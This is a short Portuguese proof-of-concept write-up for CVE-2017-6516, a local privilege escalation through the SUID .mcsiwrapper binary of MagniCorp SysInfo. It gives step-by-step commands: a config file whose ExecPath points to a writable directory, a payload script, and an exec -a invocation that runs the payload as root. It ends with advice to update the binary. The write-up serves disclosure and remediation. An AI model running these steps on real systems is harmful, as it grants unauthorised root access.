
Um PoC / metodologia para explorar CVE-2017-6516
CVE-2017-6516 é uma vulnerabilidade de escalonamento de privilégios que visa o binário .mcsiwrapper do MagniCorp SysInfo na versão 10-H64. Quando este binário tem o bit SUID definido e está desatualizado, um usuário pode executar código arbitrário como o proprietário do binário - que é frequentemente root.
.mcsiwrapper deve ter setuid:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper deve estar na versão inferior a 10-H64:$ .mcsiwrapper --version
<Version under 10-H64>
Crie um arquivo config com o seguinte conteúdo:
ExecPath=<Path to a writeable directory>
Crie um arquivo executável de payload no diretório ExecPath, por exemplo:
#!/bin/sh
whoami
E torne-o executável:
$ chmod +x payload
Execute o comando:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
Atualize .mcsiwrapper para pelo menos a versão 10-H64.